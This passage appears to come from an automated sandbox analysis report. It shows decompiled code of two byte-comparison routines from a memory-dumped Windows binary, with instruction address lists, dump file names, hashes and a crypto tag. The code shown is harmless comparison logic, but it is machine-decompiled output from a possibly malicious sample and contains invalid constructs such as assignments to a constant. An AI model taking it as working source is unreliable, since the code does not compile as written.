					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}

0x0041b1a9
0x0041b1a9
0x0041b1af
0x0041b22e
0x0041b230
0x0041b232
0x00000000
0x00000000
0x0041b238
0x0041b23e
0x0041b2bd
0x0041b2bf
0x0041b2c1
0x00000000
0x00000000
0x0041b2c7
0x0041b2cd
0x0041b34c
0x0041b34e
0x0041b350
0x00000000
0x00000000
0x0041b356
0x0041b35c
0x0041b3db
0x0041b3dd
0x0041b3df
0x00000000
0x00000000
0x0041b3e5
0x0041b3eb
0x0041b46a
0x0041b46c
0x0041b46e
0x00000000
0x00000000
0x0041b47a
0x0041b4fa
0x0041b4fc
0x0041b4fe
0x00000000
0x00000000
0x0041b504
0x0041b50a
0x0041b589
0x0041b58b
0x0041b58d
0x00000000
0x00000000
0x0041b59b
0x0041ad95
0x0041ad97
0x0041baf3
0x0041baf3
0x0041b5a9
0x0041b5ab
0x0041b187
0x0041b18f
0x0041b191
0x0041b1a2
0x0041b1a2
0x00000000
0x0041b191
0x0041b5b8
0x0041b5be
0x0041b9d7
0x00000000
0x0041b9d7
0x00000000
0x0041b5c4
0x0041b513
0x0041b515
0x0041b52c
0x0041b534
0x0041b536
0x0041b54d
0x0041b555
0x0041b557
0x0041b56e
0x0041b576
0x0041b578
0x0041b585
0x0041b585
0x00000000
0x0041b578
0x0041b564
0x0041b568
0x00000000
0x00000000
0x00000000
0x0041b568
0x0041b543
0x0041b547
0x00000000
0x00000000
0x00000000
0x0041b547
0x0041b522
0x0041b526
0x00000000
0x00000000
0x00000000
0x0041b526
0x0041b484
0x0041b486
0x0041b49d
0x0041b4a5
0x0041b4a7
0x0041b4be
0x0041b4c6
0x0041b4c8
0x0041b4df
0x0041b4e7
0x0041b4e9
0x0041b4f6
0x0041b4f6
0x00000000
0x0041b4e9
0x0041b4d5
0x0041b4d9
0x00000000
0x00000000
0x00000000
0x0041b4d9
0x0041b4b4
0x0041b4b8
0x00000000
0x00000000
0x00000000
0x0041b4b8
0x0041b493
0x0041b497
0x00000000
0x00000000
0x00000000
0x0041b497
0x0041b3f4
0x0041b3f6
0x0041b40d
0x0041b415
0x0041b417
0x0041b42e
0x0041b436
0x0041b438
0x0041b44f
0x0041b457
0x0041b459
0x0041b466
0x0041b466
0x00000000
0x0041b459
0x0041b445
0x0041b449
0x00000000
0x00000000
0x00000000
0x0041b449
0x0041b424
0x0041b428
0x00000000
0x00000000
0x00000000
0x0041b428
0x0041b403
0x0041b407
0x00000000
0x00000000
0x00000000
0x0041b407
0x0041b365
0x0041b367
0x0041b37e
0x0041b386
0x0041b388
0x0041b39f
0x0041b3a7
0x0041b3a9
0x0041b3c0
0x0041b3c8
0x0041b3ca
0x0041b3d7
0x0041b3d7
0x00000000
0x0041b3ca
0x0041b3b6
0x0041b3ba
0x00000000
0x00000000
0x00000000
0x0041b3ba
0x0041b395
0x0041b399
0x00000000
0x00000000
0x00000000
0x0041b399
0x0041b374
0x0041b378
0x00000000
0x00000000
0x00000000
0x0041b378
0x0041b2d6
0x0041b2d8
0x0041b2ef
0x0041b2f7
0x0041b2f9
0x0041b310
0x0041b318
0x0041b31a
0x0041b331
0x0041b339
0x0041b33b
0x0041b348
0x0041b348
0x00000000
0x0041b33b
0x0041b327
0x0041b32b
0x00000000
0x00000000
0x00000000
0x0041b32b
0x0041b306
0x0041b30a
0x00000000
0x00000000
0x00000000
0x0041b30a
0x0041b2e5
0x0041b2e9
0x00000000
0x00000000
0x00000000
0x0041b2e9
0x0041b247
0x0041b249
0x0041b260
0x0041b268
0x0041b26a
0x0041b281
0x0041b289
0x0041b28b
0x0041b2a2
0x0041b2aa
0x0041b2ac
0x0041b2b9
0x0041b2b9
0x00000000
0x0041b2ac
0x0041b298
0x0041b29c
0x00000000
0x00000000
0x00000000
0x0041b29c
0x0041b277
0x0041b27b
0x00000000
0x00000000
0x00000000
0x0041b27b
0x0041b256
0x0041b25a
0x00000000
0x00000000
0x00000000
0x0041b1b1
0x0041b1b1
0x0041b1b4
0x0041b1b8
0x0041b1ba
0x0041b1d1
0x0041b1d1
0x0041b1d5
0x0041b1d9
0x0041b1db
0x0041b1f2
0x0041b1f2
0x0041b1f6
0x0041b1fa
0x0041b1fc
0x0041b213
0x0041b213
0x0041b217
0x0041b21b
0x0041b21d
0x0041b223
0x0041b226
0x0041b22a
0x0041b22a
0x00000000
0x0041b21d
0x0041b202
0x0041b205
0x0041b209
0x0041b20d
0x00000000
0x00000000
0x00000000
0x0041b20d
0x0041b1e1
0x0041b1e4
0x0041b1e8
0x0041b1ec
0x00000000
0x00000000
0x00000000
0x0041b1ec
0x0041b1c0
0x0041b1c3
0x0041b1c7
0x0041b1cb
0x00000000
0x00000000
0x00000000
0x0041b1cb
0x0041a9c2
0x0041a9c2
0x00000000

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 043c4ecc74885df4fc1b3aef7f1c228586c38447278d49838fdb0d36de97f7b3
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: C1D17FB3D1B9B3068735812D40681AFEA62AFD174131FCBE28CE42F38DD22A5D9495D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD9D, Relevance: .4, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0041AD9D(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}

0x0041ad9d
0x0041ad9d
0x0041ada3
0x0041ae22
0x0041ae24
0x0041ae26
0x00000000
0x00000000
0x0041ae2c
0x0041ae32
0x0041aeb1
0x0041aeb3
0x0041aeb5
0x00000000
0x00000000
0x0041aebb
0x0041aec1
0x0041af40
0x0041af42
0x0041af44
0x00000000
0x00000000
0x0041af4a
0x0041af50
0x0041afcf
0x0041afd1
0x0041afd3
0x00000000
0x00000000
0x0041afd9
0x0041afdf
0x0041b05e
0x0041b060
0x0041b062
0x00000000
0x00000000
0x0041b06e
0x0041b0ee
0x0041b0f0
0x0041b0f2
0x00000000
0x00000000
0x0041b0f8
0x0041b0fe
0x0041b17d
0x0041b17f
0x0041b181
0x00000000
0x00000000
0x0041b18f
0x0041b191
0x0041b1a2
0x0041b1a2
0x0041ad97
0x0041baf3
0x0041baf3
0x0041b107
0x0041b109
0x0041b120
0x0041b128
0x0041b12a
0x0041b141
0x0041b149
0x0041b14b
0x0041b162
0x0041b16a
0x0041b16c
0x0041b179
0x0041b179
0x00000000
0x0041b16c
0x0041b158
0x0041b15c
0x00000000
0x00000000
0x00000000
0x0041b15c
0x0041b137
0x0041b13b
0x00000000
0x00000000
0x00000000
0x0041b13b
0x0041b116
0x0041b11a
0x00000000
0x00000000
0x00000000
0x0041b11a
0x0041b078
0x0041b07a
0x0041b091
0x0041b099
0x0041b09b
0x0041b0b2
0x0041b0ba
0x0041b0bc
0x0041b0d3
0x0041b0db
0x0041b0dd
0x0041b0ea
0x0041b0ea
0x00000000
0x0041b0dd
0x0041b0c9
0x0041b0cd
0x00000000
0x00000000
0x00000000
0x0041b0cd
0x0041b0a8
0x0041b0ac
0x00000000
0x00000000
0x00000000
0x0041b0ac
0x0041b087
0x0041b08b
0x00000000
0x00000000
0x00000000
0x0041b08b
0x0041afe8
0x0041afea
0x0041b001
0x0041b009
0x0041b00b
0x0041b022
0x0041b02a
0x0041b02c
0x0041b043
0x0041b04b
0x0041b04d
0x0041b05a
0x0041b05a
0x00000000
0x0041b04d
0x0041b039
0x0041b03d
0x00000000
0x00000000
0x00000000
0x0041b03d
0x0041b018
0x0041b01c
0x00000000
0x00000000
0x00000000
0x0041b01c
0x0041aff7
0x0041affb
0x00000000
0x00000000
0x00000000
0x0041affb
0x0041af59
0x0041af5b
0x0041af72
0x0041af7a
0x0041af7c
0x0041af93
0x0041af9b
0x0041af9d
0x0041afb4
0x0041afbc
0x0041afbe
0x0041afcb
0x0041afcb
0x00000000
0x0041afbe
0x0041afaa
0x0041afae
0x00000000
0x00000000
0x00000000
0x0041afae
0x0041af89
0x0041af8d
0x00000000
0x00000000
0x00000000
0x0041af8d
0x0041af68
0x0041af6c
0x00000000
0x00000000
0x00000000
0x0041af6c
0x0041aeca
0x0041aecc
0x0041aee3
0x0041aeeb
0x0041aeed
0x0041af04
0x0041af0c
0x0041af0e
0x0041af25
0x0041af2d
0x0041af2f
0x0041af3c
0x0041af3c
0x00000000
0x0041af2f
0x0041af1b
0x0041af1f
0x00000000
0x00000000
0x00000000
0x0041af1f
0x0041aefa
0x0041aefe
0x00000000
0x00000000
0x00000000
0x0041aefe
0x0041aed9
0x0041aedd
0x00000000
0x00000000
0x00000000
0x0041aedd
0x0041ae3b
0x0041ae3d
0x0041ae54
0x0041ae5c
0x0041ae5e
0x0041ae75
0x0041ae7d
0x0041ae7f
0x0041ae96
0x0041ae9e
0x0041aea0
0x0041aead
0x0041aead
0x00000000
0x0041aea0
0x0041ae8c
0x0041ae90
0x00000000
0x00000000
0x00000000
0x0041ae90
0x0041ae6b
0x0041ae6f
0x00000000
0x00000000
